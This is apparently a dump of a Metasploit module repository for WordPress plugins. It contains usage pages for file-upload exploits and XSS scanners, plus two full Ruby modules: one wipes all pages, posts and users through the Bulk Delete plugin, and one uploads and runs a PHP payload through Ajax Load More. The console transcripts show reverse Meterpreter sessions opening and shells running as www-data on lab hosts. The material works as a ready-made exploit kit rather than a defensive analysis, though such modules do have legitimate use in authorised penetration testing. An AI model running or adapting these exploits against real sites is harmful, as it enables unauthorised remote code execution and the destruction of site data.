Available targets:
  Id  Name
  --  ----
  0   WP Ultimate Product Caatalogue 3.1.1

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an arbitrary PHP code upload in the WordPress
  Ultimate Product Catalogue version 3.1.1. The vulnerability allows
  for arbitrary file upload and remote code execution.

References:
  http://www.osvdb.org/121164
  https://wpvulndb.com/vulnerabilities/7939
  http://blog.seeweb.it/wordpress-ultimate-product-catalogue-vulnerability/

msf exploit(wp_ultimate_product_catalogue_file_upload) > set RHOST 10.10.10.20
RHOST => 10.10.10.20
msf exploit(wp_ultimate_product_catalogue_file_upload) > check
[*] 10.10.10.20:80 - The target service is running, but could not be validated. # off-line
msf exploit(wp_ultimate_product_catalogue_file_upload) > exploit

[*] Started reverse handler on 10.10.10.10:4444
[+] 10.10.10.20:80 - Our payload is at: sAFMmSeoG.php.
[*] 10.10.10.20:80 - Calling payload...
[*] Sending stage (40499 bytes) to 10.10.10.20
[*] Meterpreter session 1 opened (10.10.10.10:4444 -> 10.10.10.20:52049) at 2015-04-27 15:34:42 -0300
[+] Deleted sAFMmSeoG.php

meterpreter > sysinfo
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686
Meterpreter : php/php
meterpreter > shell
Process 5899 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

```

--------------------------------------------------------------------------------
/documentation/auxiliary/wp_visual_form_builder_xss_scanner.md:
--------------------------------------------------------------------------------
#### Add WordPress Plugin Visual Form Builder XSS Vulnerability.

Application: WordPress Plugin 'Visual Form Builder' 2.8.2
Homepage: https://wordpress.org/plugins/visual-form-builder/
Source Code: https://downloads.wordpress.org/plugin/visual-form-builder.2.8.2.zip
References: https://wpvulndb.com/vulnerabilities/7991
Active Installs: 100,000+

#### Vulnerable packages*

2.8.2

#### Usage:

##### Linux (Ubuntu 14.04.2 LTS):
```
msf > use auxiliary/scanner/http/wp_visual_form_builder_xss_scanner
msf auxiliary(wp_visual_form_builder_xss_scanner) > info

       Name: WordPress Visual Form Builder Plugin XSS Scanner
     Module: auxiliary/scanner/http/wp_visual_form_builder_xss_scanner
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2015-05-15

Provided by:
  Tim Coen
  Roberto Soares Espreto

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                        yes       The target address range or CIDR identifier
  RPORT        80               yes       The target port
  TARGETURI    /                yes       The base path to the wordpress application
  THREADS      1                yes       The number of concurrent threads
  VHOST                         no        HTTP server virtual host
  WP_PASSWORD                   yes       Valid password for the provided username
  WP_USER                       yes       A valid username

Description:
  This module attempts to exploit a authenticated Cross-Site Scripting
  in Visual Form Builder Plugin for WordPress, version 2.8.2 and
  likely prior in order if the instance is vulnerable.

References:
  https://wpvulndb.com/vulnerabilities/7991
  http://software-talk.org/blog/2015/05/sql-injection-reflected-xss-visual-form-builder-wordpress-plugin/

msf auxiliary(wp_visual_form_builder_xss_scanner) > show options

Module options (auxiliary/scanner/http/wp_visual_form_builder_xss_scanner):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target address range or CIDR identifier
   RPORT        80               yes       The target port
   TARGETURI    /                yes       The base path to the wordpress application
   THREADS      1                yes       The number of concurrent threads
   VHOST                         no        HTTP server virtual host
   WP_PASSWORD                   yes       Valid password for the provided username
   WP_USER                       yes       A valid username

msf auxiliary(wp_visual_form_builder_xss_scanner) > set RHOSTS 192.168.1.38
RHOSTS => 192.168.1.38
msf auxiliary(wp_visual_form_builder_xss_scanner) > set WP_USER espreto
WP_USER => espreto
msf auxiliary(wp_visual_form_builder_xss_scanner) > set WP_PASSWORD dvd43145
WP_PASSWORD => dvd43145
msf auxiliary(wp_visual_form_builder_xss_scanner) > run

[*] 192.168.1.38:80 - Trying to login as espreto
[+] 192.168.1.38:80 - Login successful
[+] 192.168.1.38:80 - Vulnerable to Cross-Site Scripting the "Visual Form Builder 2.8.2" plugin for WordPress
[+] Save in: /home/espreto/.msf4/local/43225550.html
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wp_visual_form_builder_xss_scanner) > firefox /home/espreto/.msf4/local/43225550.html
[*] exec: firefox /home/espreto/.msf4/local/43225550.html

```
This will open the browser:

![XSS](../images/wp_visual_form_builder_xss_scanner.jpg)

--------------------------------------------------------------------------------
/documentation/auxiliary/wp_eshop_xss_scanner.md:
--------------------------------------------------------------------------------
#### Add WordPress eShop XSS Vulnerability.

Application: WordPress Plugin eShop 6.3.13
Homepage: https://wordpress.org/plugins/eshop/
Source Code: https://downloads.wordpress.org/plugin/eshop.6.3.13.zip
References: https://wpvulndb.com/vulnerabilities/8180

#### Vulnerable packages*

6.3.13

#### Usage:

##### Linux (Ubuntu 12.04.5 LTS):
```
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> use auxiliary/scanner/http/wp_eshop_xss_scanner
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_eshop_xss_scanner) show options

Module options (auxiliary/scanner/http/wp_eshop_xss_scanner):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target address range or CIDR identifier
   RPORT        80               yes       The target port
   TARGETURI    /                yes       The base path to the wordpress application
   THREADS      1                yes       The number of concurrent threads
   VHOST                         no        HTTP server virtual host
   WP_PASSWORD                   yes       A valid password
   WP_USERNAME                   yes       A valid username

msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_eshop_xss_scanner) info

       Name: WordPress eShop XSS Scanner
     Module: auxiliary/scanner/http/wp_eshop_xss_scanner
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2015-09-04

Provided by:
  Ehsan Hosseini
  Roberto Soares Espreto

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                        yes       The target address range or CIDR identifier
  RPORT        80               yes       The target port
  TARGETURI    /                yes       The base path to the wordpress application
  THREADS      1                yes       The number of concurrent threads
  VHOST                         no        HTTP server virtual host
  WP_PASSWORD                   yes       A valid password
  WP_USERNAME                   yes       A valid username

Description:
  This module attempts to exploit a Cross-Site Scripting in eShop
  Plugin for WordPress, version 6.3.13 and likely prior in order if
  the instance is vulnerable.

References:
  https://packetstormsecurity.com/files/133480
  https://wpvulndb.com/vulnerabilities/8180

msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_eshop_xss_scanner) set RHOSTS 10.10.10.20
RHOSTS => 10.10.10.20
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_eshop_xss_scanner) set WP_USERNAME espreto
WP_USERNAME => espreto
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_eshop_xss_scanner) set WP_PASSWORD P@ssw0rd
WP_PASSWORD => P@ssw0rd
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_eshop_xss_scanner) check
[*] 10.10.10.20:80 - The target appears to be vulnerable.
[*] Checked 1 of 1 hosts (100% complete)
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_eshop_xss_scanner) run

[+] 10.10.10.20:80 - Vulnerable to Cross-Site Scripting the eShop 6.3.13 plugin for WordPress
[+] Save in: /home/espreto/.msf4/local/79818718.html
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_eshop_xss_scanner) firefox /home/espreto/.msf4/local/79818718.html
[*] exec: firefox /home/espreto/.msf4/local/79818718.html
```

This will open the browser:

![XSS](../images/wp_eshop_xss_scanner.png)
--------------------------------------------------------------------------------
/documentation/exploits/wp_woocommerce_file_upload.md:
--------------------------------------------------------------------------------
#### Add WordPress WooCommerce Amazon Affiliates 7.0 Upload Vulnerability.

Application: WordPress WooCommerce Amazon Affiliates
Homepage: http://codecanyon.net/item/woocommerce-amazon-affiliates-wordpress-plugin/3057503
Reference: https://wpvulndb.com/vulnerabilities/7940

#### Vulnerable packages*

7.0

#### Usage:

##### Linux (Ubuntu 12.04.5 LTS):
```
msf > use exploit/unix/webapp/wp_woocommerce_file_upload
msf exploit(wp_woocommerce_file_upload) > show options

Module options (exploit/unix/webapp/wp_woocommerce_file_upload):

   Name       Current Setting                   Required  Description
   ----       ---------------                   --------  -----------
   KEY        c125a47cba1e8ec73945dd622d142f79  yes       A valid key on the target host
   Proxies                                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                                        yes       The target address
   RPORT      80                                yes       The target port
   TARGETURI  /                                 yes       The base path to the wordpress application
   VHOST                                        no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   WooCommerce Amazon Affiliates 7.0


msf exploit(wp_woocommerce_file_upload) > info

       Name: WordPress WooCommerce Amazon Affiliates Upload Vulnerability
     Module: exploit/unix/webapp/wp_woocommerce_file_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2015-04-01

Provided by:
  Evex_1337
  Roberto Soares Espreto

Available targets:
  Id  Name
  --  ----
  0   WooCommerce Amazon Affiliates 7.0

Basic options:
  Name       Current Setting                   Required  Description
  ----       ---------------                   --------  -----------
  KEY        c125a47cba1e8ec73945dd622d142f79  yes       A valid key on the target host
  Proxies                                      no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                                        yes       The target address
  RPORT      80                                yes       The target port
  TARGETURI  /                                 yes       The base path to the wordpress application
  VHOST                                        no        HTTP server virtual host

Payload information:

Description:
  This module exploits an arbitrary file upload in the WordPress
  WooCommerce Amazon Affiliates version 7.0. It allows to upload
  arbitrary php files and get remote code execution. This module has
  been tested successfully on WordPress 4.2.1 on Ubuntu 14.04 Server.

References:
  https://wpvulndb.com/vulnerabilities/7940
  http://packetstormsecurity.com/files/131629/
  http://research.evex.pw/?vuln=13

msf exploit(wp_woocommerce_file_upload) > set RHOST 192.168.1.31
RHOST => 192.168.1.31
msf exploit(wp_woocommerce_file_upload) > exploit

[*] Started reverse handler on 192.168.1.37:4444
[+] 192.168.1.31:80 - Injecting payload...
[*] 192.168.1.31:80 - Calling payload...
[*] Sending stage (40499 bytes) to 192.168.1.31
[*] Meterpreter session 9 opened (192.168.1.37:4444 -> 192.168.1.31:41528) at 2015-05-08 02:37:07 -0300
[+] Restored original content.

meterpreter > sysinfo
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686
Meterpreter : php/php
meterpreter > shell
Process 18718 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

```
--------------------------------------------------------------------------------
/modules/auxiliary/dos/http/wp_bulk_delete_dos.rb:
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HTTP::Wordpress

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Bulk Delete DoS',
      'Description'    => %q{
        Exercises the privilege-escalation issue in the Bulk Delete plugin for
        WordPress (fixed in 5.5.4). Once authenticated, the module triggers the
        plugin's bulk actions and deletes most of the site's content, including
        posts, pages and users.
      },
      'Author'         => ['Panagiotis Vagenas '],
      'License'        => MSF_LICENSE,
      # Reference entries are [type, value] pairs, not a Hash.
      'References'     => [
        ['URL', 'http://pvagenas.com/vulnerabilities/bulk-delete-privilege-escalation/']
      ],
      'DisclosureDate' => 'Mar 02 2016'
    ))

    register_options(
      [
        OptString.new('USERNAME', [true, 'The username to authenticate with']),
        OptString.new('PASSWORD', [true, 'The password to authenticate with'])
      ], self.class)
  end

  # Versions below 5.5.4 (the release that shipped the fix) are reported as vulnerable.
  def check
    check_plugin_version_from_readme('bulk-delete', '5.5.4')
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  # Submit one Bulk Delete action: the action name travels in the query string,
  # the form fields in the POST body and the WordPress session in the cookie.
  def do_action(action, data)
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(wordpress_url_backend, 'index.php'),
      'vars_get'  => { bd_action: action },
      'vars_post' => data,
      'cookie'    => @cookie
    )

    if res.nil?
      vprint_error('No response from the target.')
    elsif res.code != 200
      vprint_warning("Server responded with status code #{res.code}")
    end

    res
  end

  def run
    print_status("Authenticating with WordPress using #{username}:#{password}...")

    @cookie = wordpress_login(username, password)
    if @cookie.nil?
      print_error('Failed to authenticate with WordPress')
      return
    end

    print_good('Authenticated with WordPress')

    print_status('Deleting all pages')
    r = do_action('delete_pages_by_status', {
      smbd_pages_force_delete: 'true',
      smbd_published_pages: 'published_pages',
      smbd_draft_pages: 'draft_pages',
      smbd_pending_pages: 'pending_pages',
      smbd_future_pages: 'future_pages',
      smbd_private_pages: 'private_pages'
    })

    if r.nil? || r.code != 200
      print_error('Failed to delete all pages, maybe target is not vulnerable')
    else
      vprint_good("Deleting all pages returned status code #{r.code}")
    end

    print_status('Deleting all posts from all default post types')

    %w(post page attachment revision nav_menu_item).each do |a|
      vprint_status("Deleting all posts from post type #{a}")

      r = do_action('delete_posts_by_post_type', { 'smbd_types[0]' => a })

      if r.nil? || r.code != 200
        vprint_error("Failed to delete all posts from post type #{a}")
      else
        vprint_good("Deleting all posts returned status code #{r.code}")
      end
    end

    print_status('Deleting all users')

    # A LIKE comparison against an empty value is intended to match every user
    # that carries the 'nickname' meta key, i.e. all of them.
    r = do_action('delete_users_by_meta', {
      smbd_u_meta_key: 'nickname',
      smbd_u_meta_compare: 'LIKE',
      smbd_u_meta_value: ''
    })

    if r.nil? || r.code != 200
      print_error('Failed to delete all users, maybe target is not vulnerable')
    else
      vprint_good("Deleting all users returned status code #{r.code}")
    end

    print_status('Exploitation complete, please check output for details')
  end
end
--------------------------------------------------------------------------------
/documentation/exploits/wp_slideshowgallery_file_upload.md:
--------------------------------------------------------------------------------
#### Add WordPress SlideShow Gallery 1.4.6 Shell Upload.

Application: WordPress Tribulant Slideshow Gallery
Homepage: https://wordpress.org/plugins/slideshow-gallery/
Source Code: https://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip

#### Vulnerable packages*

1.4.6

#### Usage:

##### Linux (Ubuntu 12.04.5 LTS):
```
msf > use exploit/unix/webapp/wp_slideshowgallery_upload
msf exploit(wp_slideshowgallery_upload) > show options

Module options (exploit/unix/webapp/wp_slideshowgallery_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Valid password for the provided username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   USER                        yes       A valid username
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   WP SlideShow Gallery 1.4.6


msf exploit(wp_slideshowgallery_upload) > info

       Name: WordPress SlideShow Gallery Authenticated File Upload
     Module: exploit/unix/webapp/wp_slideshowgallery_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2014-08-28

Provided by:
  Jesus Ramirez Pichardo
  Roberto Soares Espreto

Available targets:
  Id  Name
  --  ----
  0   WP SlideShow Gallery 1.4.6

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    yes       Valid password for the provided username
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  USER                        yes       A valid username
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  The WordPress SlideShow Gallery plugin contains an authenticated
  file upload vulnerability. We can upload arbitrary files to the
  upload folder, because the plugin uses it's own file upload
  mechanism instead of the wordpress api it's possible to upload any
  file type. The user provided does not need special rights, and users
  with "Contributor" role can be abused.

References:
  http://cvedetails.com/cve/2014-5460/
  http://www.exploit-db.com/exploits/34681/

msf exploit(wp_slideshowgallery_upload) > set RHOST 192.168.1.31
RHOST => 192.168.1.31
msf exploit(wp_slideshowgallery_upload) > set USER espreto
USER => espreto
msf exploit(wp_slideshowgallery_upload) > set PASSWORD xxxxxxx
PASSWORD => xxxxxxx
msf exploit(wp_slideshowgallery_upload) > exploit

[*] Started reverse handler on 192.168.1.46:4444
[*] 192.168.1.31:80 - Trying to login as espreto
[*] 192.168.1.31:80 - Trying to upload payload
[*] 192.168.1.31:80 - Uploading payload
[*] 192.168.1.31:80 - Calling uploaded file tfyteogt.php
[*] Sending stage (40499 bytes) to 192.168.1.31
[*] Meterpreter session 1 opened (192.168.1.46:4444 -> 192.168.1.31:40298) at 2015-04-13 03:46:36 -0300
[+] Deleted tfyteogt.php

meterpreter > sysinfo
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686
Meterpreter : php/php
meterpreter >
```
--------------------------------------------------------------------------------
/documentation/auxiliary/wp_social_media_and_share_xss_scanner.md:
--------------------------------------------------------------------------------
#### Add WordPress Plugin Ultimate Social Media XSS Vulnerability.

Application: WordPress Plugin 'Ultimate Social Media' 1.1.1.11
Homepage: https://wordpress.org/plugins/ultimate-social-media-icons/
Source Code: https://downloads.wordpress.org/plugin/ultimate-social-media-icons.1.1.1.11.zip
References: https://wpvulndb.com/vulnerabilities/8231
Active Installs: 60,000+

#### Vulnerable packages*

1.1.1.11

#### Usage:

##### Linux (Ubuntu 12.04.5 LTS):
```
msfdevel 192.168.0.5 shell[s]:0 job[s]:0 msf> use auxiliary/scanner/http/wp_social_media_and_share_xss_scanner
msfdevel 192.168.0.5 shell[s]:0 job[s]:0 msf> auxiliary(wp_social_media_and_share_xss_scanner) info

       Name: WordPress Social Media and Share Icons XSS Scanner
     Module: auxiliary/scanner/http/wp_social_media_and_share_xss_scanner
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2015-11-22

Provided by:
  g0blin
  Roberto Soares Espreto

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target address range or CIDR identifier
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  THREADS    1                yes       The number of concurrent threads
  VHOST                       no        HTTP server virtual host
  WP_PASS                     yes       A valid password
  WP_USER                     yes       A valid username

Description:
  This module attempts to exploit an Authenticated Cross-Site
  Scripting in Social Media and Share Icons Plugin for WordPress,
  version 1.1.1.11 and likely prior in order if the instance is
  vulnerable.

References:
  https://wpvulndb.com/vulnerabilities/8231
  https://research.g0blin.co.uk/g0blin-00052/

msfdevel 192.168.0.5 shell[s]:0 job[s]:0 msf> auxiliary(wp_social_media_and_share_xss_scanner) show options

Module options (auxiliary/scanner/http/wp_social_media_and_share_xss_scanner):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host
   WP_PASS                     yes       A valid password
   WP_USER                     yes       A valid username

msfdevel 192.168.0.5 shell[s]:0 job[s]:0 msf> auxiliary(wp_social_media_and_share_xss_scanner) set RHOSTS 192.168.0.14
RHOSTS => 192.168.0.14
msfdevel 192.168.0.5 shell[s]:0 job[s]:0 msf> auxiliary(wp_social_media_and_share_xss_scanner) set WP_USER espreto
WP_USER => espreto
msfdevel 192.168.0.5 shell[s]:0 job[s]:0 msf> auxiliary(wp_social_media_and_share_xss_scanner) set WP_PASS wp@2015
WP_PASS => wp@2015
msfdevel 192.168.0.5 shell[s]:0 job[s]:0 msf> auxiliary(wp_social_media_and_share_xss_scanner) check
[*] 192.168.0.14:80 - The target appears to be vulnerable.
[*] Checked 1 of 1 hosts (100% complete)
msfdevel 192.168.0.5 shell[s]:0 job[s]:0 msf> auxiliary(wp_social_media_and_share_xss_scanner) run

[+] 192.168.0.14:80 - Vulnerable to Cross-Site Scripting the Ultimate Social Media 1.1.1.11 plugin for WordPress
[+] Save in: /home/espreto/.msf4/local/32395811.html
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msfdevel 192.168.0.5 shell[s]:0 job[s]:0 msf> auxiliary(wp_social_media_and_share_xss_scanner)
```
--------------------------------------------------------------------------------
/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb:
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Ajax Load More PHP Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary file upload in the WordPress Ajax Load More
        plugin, version 2.8.1.1 and likely prior (fixed in 2.8.1.2). An authenticated
        user can save a "repeater template" whose body is written unchanged to a PHP
        file under the plugin directory, which gives remote code execution. This
        module has been tested successfully on WordPress Ajax Load More 2.8.0 with
        WordPress 4.1.3 on Ubuntu 12.04/14.04 Server.
      },
      'Author'         =>
        [
          'Unknown', # Identify yourself || send a PR here
          'Roberto Soares Espreto ' # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['WPVDB', '8209']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Ajax Load More 2.8.1.1', {}]],
      'DisclosureDate' => 'Oct 10 2015',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('WP_USERNAME', [true, 'A valid username', nil]),
        OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
      ], self.class
    )
  end

  # Versions below 2.8.1.2 (the release that shipped the fix) are reported as vulnerable.
  def check
    check_plugin_version_from_readme('ajax-load-more', '2.8.1.2')
  end

  def username
    datastore['WP_USERNAME']
  end

  def password
    datastore['WP_PASSWORD']
  end

  # The save action is nonce-protected; the nonce is embedded in the JavaScript
  # settings of the plugin's "Repeater Templates" admin page.
  def get_nonce(cookie)
    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => normalize_uri(wordpress_url_backend, 'admin.php'),
      'vars_get' => {
        'page' => 'ajax-load-more-repeaters'
      },
      'cookie'   => cookie
    )

    if res && res.body && res.body =~ /php","alm_admin_nonce":"([a-z0-9]+)"}/
      return Regexp.last_match[1]
    else
      return nil
    end
  end

  def exploit
    vprint_status("#{peer} - Trying to login as #{username}")
    cookie = wordpress_login(username, password)
    fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil?

    vprint_status("#{peer} - Trying to get nonce")
    nonce = get_nonce(cookie)
    fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil?

    vprint_status("#{peer} - Trying to upload payload")
    # The repeater named "default" is stored as core/repeater/default.php.
    filename = 'default.php'

    print_status("#{peer} - Uploading payload")
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
      'vars_post' => {
        'action'   => 'alm_save_repeater',
        'value'    => payload.encoded,
        'repeater' => 'default',
        'type'     => 'default',
        'alias'    => '',
        'nonce'    => nonce
      },
      'cookie'    => cookie
    )

    if res
      if res.code == 200 && res.body.include?('Template Saved Successfully')
        register_files_for_cleanup(filename)
      else
        fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    print_status("#{peer} - Calling uploaded file")
    send_request_cgi(
      'uri' => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename)
    )
  end
end
--------------------------------------------------------------------------------
/documentation/exploits/wp_acf_frontend_display_file_upload.md:
--------------------------------------------------------------------------------
#### Add WordPress ACF FrontEnd Display Plugin File Upload Vulnerability.

Application: WordPress Plugin "ACF FrontEnd Display" 2.0.5
Homepage: https://wordpress.org/plugins/acf-frontend-display/
Source Code: https://www.exploit-db.com/apps/62a3a9c3b3867c0a37a7e91f9de53f12-acf-frontend-display.2.0.5.zip

#### Vulnerable packages*

2.0.5

#### Usage:

##### Linux (Ubuntu 12.04.5 LTS):
```
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> use exploit/unix/webapp/wp_acf_frontend_display_file_upload
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(wp_acf_frontend_display_file_upload) show options

Module options (exploit/unix/webapp/wp_acf_frontend_display_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   ACF FrontEnd Display 2.0.5


msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(wp_acf_frontend_display_file_upload) info

       Name: WordPress ACF FrontEnd Display Upload Vulnerability
     Module: exploit/unix/webapp/wp_acf_frontend_display_file_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2015-07-03

Provided by:
  TUNISIAN CYBER
  Roberto Soares Espreto

Available targets:
  Id  Name
  --  ----
  0   ACF FrontEnd Display 2.0.5

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an arbitrary PHP code upload in the WordPress
  ACF FrontEnd Display version 2.0.5. The vulnerability allows for
  arbitrary file upload and remote code execution.

References:
  https://www.exploit-db.com/exploits/37514
  https://wpvulndb.com/vulnerabilities/7867
  http://packetstormsecurity.com/files/132590/
  http://www.antihackers.ro/blog/wordpress-acf-frontend-display-plugin-2-0-5-file-upload-vulnerability/

msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(wp_acf_frontend_display_file_upload) set RHOST 10.10.10.20
RHOST => 10.10.10.20
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(wp_acf_frontend_display_file_upload) check
[*] 10.10.10.20:80 - The target appears to be vulnerable.
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(wp_acf_frontend_display_file_upload) exploit

[*] Started reverse handler on 10.10.10.10:4444
[*] 10.10.10.20:80 - Calling payload...
[*] Sending stage (32461 bytes) to 10.10.10.20
[*] Meterpreter session 3 opened (10.10.10.10:4444 -> 10.10.10.20:42508) at 2015-08-01 18:36:36 -0300
[+] Deleted lObRcITyBeDR.php

meterpreter > sysinfo
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-61-generic #100~precise1-Ubuntu SMP Wed Jul 29 12:07:07 UTC 2015 i686
Meterpreter : php/php
meterpreter > shell
Process 3774 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^Z
Background channel 0? [y/N] y
meterpreter > background
[*] Backgrounding session 3...
msfdevel 10.10.10.10 shell[s]:1 job[s]:0 msf> exploit(wp_acf_frontend_display_file_upload)
```
--------------------------------------------------------------------------------
/documentation/auxiliary/wp_ninja_forms_xss_scanner.md:
--------------------------------------------------------------------------------
#### Add WordPress Plugin Ninja Forms XSS Vulnerability.

Application: WordPress Plugin 'Ninja Forms' 2.9.21
Homepage: https://wordpress.org/plugins/ninja-forms
Source Code: https://downloads.wordpress.org/plugin/ninja-forms.2.9.21.zip
References: https://wpvulndb.com/vulnerabilities/8128
Active Installs: 200,000+

#### Vulnerable packages*

2.9.21

#### Module

[wp_ninja_forms_xss_scanner.rb](https://github.com/espreto/wpsploit/blob/master/modules/auxiliary/scanner/http/wordpress/wp_ninja_forms_xss_scanner.rb)

#### Usage:

##### Linux (Ubuntu 14.04.2 LTS):
```
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> use auxiliary/scanner/http/wp_ninja_forms_xss_scanner
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_ninja_forms_xss_scanner) show options

Module options (auxiliary/scanner/http/wp_ninja_forms_xss_scanner):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host
   WP_PASS                     yes       A valid password
   WP_USER                     yes       A valid username

